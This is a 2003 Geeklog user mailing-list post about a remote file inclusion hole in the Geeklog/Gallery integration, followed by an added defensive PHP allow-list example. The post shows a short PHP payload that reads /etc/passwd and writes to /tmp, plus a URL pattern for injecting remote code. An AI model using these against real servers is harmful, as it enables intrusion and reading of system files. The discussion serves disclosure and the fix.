[geeklog-users] Geeklog/Gallery vulnerability

Jason Signalness jason at btiadmin.net
Tue Dec 9 17:43:26 EST 2003


Dirk Haun wrote:

>Jason,
>
>>This article worries me a bit:
>>http://www.securityfocus.com/guest/24043
>
>[...]
>
>>The vulnerability discussed allowed me to write arbitrary data to the
>>server's hard disk, run all kinds of shell commands, and get the output
>>back in my browser.  Worrying to be sure.
>
>Hmm, I've only skimmed the article yet but my first impression was that
>it a) was "only" a problem of the Geeklog/Gallery integration (not of
>Geeklog itself) and b) was "only" used to send spam.
>
>I must have missed the bit about writing to the server's hard disk, but I
>don't really have the time now to look into it. Can someone confirm if
>this is "only" a problem with the Gallery integration?
>
>bye, Dirk

Hello again,

The article didn't mention writing to the server's hard disk.  I was 
able to do that myself after reading the article.  It's not hard, once 
you get the basic idea.

Essentially, this allows you to feed PHP script to a remote server, 
which will then execute it.  So, if your server is running Gallery & 
Geeklog, I can make your server execute this:

<?
passthru('cat /etc/passwd');
passthru('echo "MY DATA HERE" > /tmp/mydataonyourdisk.file');
. . .
?>

As far as I know, this is possible anywhere someone does something like 
this:
include("$VARIABLE/file.php");

A user in the know could construct a URL like 
http://yoursite.com/blah.php?VARIABLE=http://mysite.com/mycode.php.

I'm not an expert by any means, so if this doesn't make sense or is 
wrong, let me know.

-Jason
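
Added example, not part of the original message and not Geeklog or Gallery code: one way to close the include pattern described above is to let the request choose only from a fixed list of module names and to confirm the resolved file stays inside a known directory. The function name, module names, directory and sample inputs below are all constructed for illustration.

```php
<?php
// Hypothetical helper (assumption, not from either project). The pattern in
// the message, include("$VARIABLE/file.php"), is dangerous when the variable
// can be set from the URL (register_globals) and PHP may include remote URLs.
// Turning off register_globals and allow_url_include (or allow_url_fopen on
// older PHP) in php.ini is the matching configuration fix.

/** Map a caller-supplied module name to a file under $baseDir, or null. */
function resolve_include(string $name, string $baseDir, array $allowed): ?string
{
    // 1. Allow-list: the request may only pick a name we chose in advance.
    if (!in_array($name, $allowed, true)) {
        return null;
    }
    // 2. Defence in depth: the resolved file must exist inside $baseDir.
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $name . '.php');
    if ($path === false) {
        return null; // allowed name, but no such file on disk
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo: a throwaway module directory with one module file.
$baseDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'include_demo_' . getmypid();
mkdir($baseDir);
file_put_contents("$baseDir/album.php", '<?php echo "album module loaded\n";');

$allowed = ['album', 'slideshow'];
// Constructed inputs: a valid name, a URL, a traversal attempt, and an
// allow-listed name whose file does not exist.
$samples = ['album', 'http://example.invalid/code', '../../etc/passwd', 'slideshow'];

foreach ($samples as $input) {
    $path = resolve_include($input, $baseDir, $allowed);
    if ($path === null) {
        echo "rejected: $input\n";
    } else {
        include $path; // only ever a local file we placed there ourselves
    }
}

unlink("$baseDir/album.php");
rmdir($baseDir);
```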



